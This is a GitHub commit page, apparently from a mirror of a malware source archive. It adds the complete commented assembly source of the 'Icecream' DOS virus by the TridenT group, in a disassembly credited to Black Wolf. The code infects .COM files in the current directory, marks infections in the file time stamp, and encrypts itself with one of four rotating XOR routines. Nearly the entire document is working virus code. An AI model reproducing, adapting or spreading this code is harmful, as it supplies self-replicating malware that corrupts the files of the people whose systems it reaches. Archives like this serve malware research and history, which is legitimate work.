mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
Add files via upload
This commit is contained in:
vxunderground
GitHub
@@ -0,0 +1,259 @@
|
||||
;Icecream Virus by the TridenT virus research group.
|
||||
|
||||
;This is a simple direct-action com virus that uses one of
|
||||
;4 encryption algorithms to encrypt itself each time it infects a file.
|
||||
;It will infect one .COM file in the current directory every time it is
|
||||
;executed. It marks infections with the time stamp.
|
||||
|
||||
|
||||
;Disassembly by Black Wolf
|
||||
|
||||
.model tiny
|
||||
.code
|
||||
org 100h
|
||||
|
||||
start:
|
||||
db 0e9h,0ch,0 ;jmp Virus_Entry
|
||||
|
||||
Author_Name db 'John Tardy'
|
||||
|
||||
db 0E2h,0FAh
|
||||
Virus_Entry:
|
||||
push ax
|
||||
call Get_Offset
|
||||
Get_Offset:
|
||||
pop ax
|
||||
sub ax,offset Get_Offset
|
||||
|
||||
db 89h,0c5h ;mov bp,ax
|
||||
lea si,[bp+Storage]
|
||||
mov di,100h ;Restore file
|
||||
movsw
|
||||
movsb
|
||||
|
||||
mov ah,1Ah
|
||||
mov dx,0f900h
|
||||
int 21h ;Set DTA
|
||||
|
||||
mov ah,4Eh
|
||||
|
||||
FindFirstNext:
|
||||
lea dx,[bp+ComMask]
|
||||
xor cx,cx
|
||||
int 21h ;Find File
|
||||
jnc InfectFile
|
||||
|
||||
Restore_DTA:
|
||||
mov ah,1Ah
|
||||
mov dx,80h
|
||||
int 21h ;Set DTA to default
|
||||
|
||||
mov bx,offset start
|
||||
pop ax ;Return to host
|
||||
push bx
|
||||
retn
|
||||
|
||||
InfectFile:
|
||||
mov ax,4300h
|
||||
mov dx,0f91eh
|
||||
int 21h ;Get file attribs
|
||||
|
||||
push cx ;save 'em
|
||||
mov ax,4301h
|
||||
xor cx,cx
|
||||
int 21h ;Set them to 0
|
||||
|
||||
mov ax,3D02h
|
||||
int 21h ;Open file
|
||||
|
||||
mov bx,5700h
|
||||
xchg ax,bx
|
||||
int 21h ;Get file time
|
||||
|
||||
push cx
|
||||
push dx ;save it
|
||||
and cx,1Fh
|
||||
cmp cx,1 ;check for infection
|
||||
jne ContinueInfection
|
||||
db 0e9h,69h,0 ;jmp DoneInfect
|
||||
|
||||
ContinueInfection:
|
||||
mov ah,3Fh
|
||||
lea dx,[bp+Storage]
|
||||
mov cx,3
|
||||
int 21h ;Read in first 3 bytes
|
||||
|
||||
mov ax,cs:[Storage+bp]
|
||||
cmp ax,4D5Ah ;Is it an EXE?
|
||||
je DoneInfect
|
||||
cmp ax,5A4Dh
|
||||
je DoneInfect ;Other EXE signature?
|
||||
|
||||
pop dx
|
||||
pop cx
|
||||
and cx,0FFE0h ;Change stored time values
|
||||
or cx,1 ;to mark infection
|
||||
push cx
|
||||
push dx
|
||||
|
||||
mov ax,4202h ;Go to the end of the file
|
||||
call Move_FP
|
||||
sub ax,3
|
||||
mov cs:[JumpSize+bp],ax ;Save jump size
|
||||
|
||||
add ax,10Fh ;Save encryption starting
|
||||
mov word ptr [bp+EncPtr1+1],ax ;point....
|
||||
mov word ptr [bp+EncPtr2+1],ax
|
||||
mov word ptr [bp+EncPtr3+1],ax
|
||||
mov word ptr [bp+EncPtr4+1],ax
|
||||
call SetupEncryption ;Encrypt virus
|
||||
|
||||
mov ah,40h
|
||||
mov dx,0fa00h
|
||||
mov cx,1F5h
|
||||
int 21h ;Write virus to file
|
||||
|
||||
mov ax,4200h
|
||||
call Move_FP ;Go to the beginning of file
|
||||
|
||||
mov ah,40h
|
||||
lea dx,[bp+JumpBytes]
|
||||
mov cx,3
|
||||
int 21h ;Write in jump
|
||||
|
||||
call FinishFile
|
||||
jmp Restore_DTA
|
||||
|
||||
DoneInfect:
|
||||
call FinishFile
|
||||
mov ah,4Fh
|
||||
jmp FindFirstNext
|
||||
|
||||
Move_FP:
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 21h
|
||||
ret
|
||||
|
||||
FinishFile:
|
||||
pop si dx cx
|
||||
mov ax,5701h ;Reset file time/date stamp
|
||||
int 21h ;(or mark infection)
|
||||
|
||||
mov ah,3Eh
|
||||
int 21h ;Close new host file
|
||||
|
||||
mov ax,4301h
|
||||
pop cx
|
||||
mov dx,0fc1eh
|
||||
int 21h ;Restore old attributes
|
||||
|
||||
push si
|
||||
retn
|
||||
|
||||
Message db ' I scream, you scream, we both '
|
||||
db 'scream for an ice-cream! '
|
||||
|
||||
SetupEncryption:
|
||||
xor byte ptr [bp+10Dh],2
|
||||
xor ax,ax
|
||||
mov es,ax
|
||||
mov ax,es:[46ch] ;Get random number
|
||||
push cs
|
||||
pop es
|
||||
push ax
|
||||
and ax,7FFh
|
||||
add ax,1E9h
|
||||
mov word ptr [bp+EncSize1+1],ax
|
||||
mov word ptr [bp+EncSize2+1],ax
|
||||
mov word ptr [bp+EncSize3+1],ax
|
||||
mov word ptr [bp+EncSize4+1],ax
|
||||
pop ax
|
||||
push ax
|
||||
and ax,3
|
||||
shl ax,1
|
||||
mov si,ax
|
||||
mov ax,[bp+si+EncData1]
|
||||
add ax,bp
|
||||
mov si,ax
|
||||
lea di,[bp+103h]
|
||||
movsw
|
||||
movsw
|
||||
movsw
|
||||
movsw ;Copy Encryption Algorithm
|
||||
pop ax
|
||||
stosb
|
||||
movsb
|
||||
mov dl,al
|
||||
lea si,[bp+103h]
|
||||
mov di,0fa00h
|
||||
mov cx,0Ch
|
||||
rep movsb
|
||||
lea si,[bp+10Fh]
|
||||
mov cx,1E9h
|
||||
|
||||
EncryptVirus:
|
||||
lodsb
|
||||
db 30h,0d0h ;xor al,dl
|
||||
stosb
|
||||
loop EncryptVirus
|
||||
|
||||
cmp dl,0
|
||||
je KeyWasZero
|
||||
retn
|
||||
|
||||
KeyWasZero: ;If key is zero, increase
|
||||
mov si,offset AuthorName ;jump size and place name
|
||||
mov di,0fa00h ;at beginning....
|
||||
mov cx,0Ah
|
||||
rep movsb
|
||||
mov ax,cs:[JumpSize+bp]
|
||||
add ax,0Ch
|
||||
mov cs:[JumpSize+bp],ax
|
||||
retn
|
||||
|
||||
db '[TridenT]'
|
||||
|
||||
EncData1 dw 02beh
|
||||
EncData2 dw 02c7h
|
||||
EncData3 dw 02d0h
|
||||
EncData4 dw 02d9h
|
||||
|
||||
Encryptions:
|
||||
;------------------------------------------------------------
|
||||
EncPtr1:
|
||||
mov si,0
|
||||
EncSize1:
|
||||
mov cx,0
|
||||
xor byte ptr [si],46h
|
||||
;------------------------------------------------------------
|
||||
EncPtr2:
|
||||
mov di,0
|
||||
EncSize2:
|
||||
mov cx,0
|
||||
xor byte ptr [di],47h
|
||||
;------------------------------------------------------------
|
||||
EncSize3:
|
||||
mov cx,0
|
||||
EncPtr3:
|
||||
mov si,0
|
||||
xor byte ptr [si],46h
|
||||
;------------------------------------------------------------
|
||||
EncSize4:
|
||||
mov cx,0
|
||||
EncPtr4:
|
||||
mov di,0
|
||||
xor byte ptr [di],47h
|
||||
;------------------------------------------------------------
|
||||
|
||||
AuthorName db 'John Tardy'
|
||||
|
||||
JumpBytes db 0E9h
|
||||
JumpSize dw 0
|
||||
|
||||
ComMask db '*.CoM',0
|
||||
|
||||
Storage dw 20CDh
|
||||
db 21h
|
||||
|
||||
end start
|
||||
Reference in New Issue
Block a user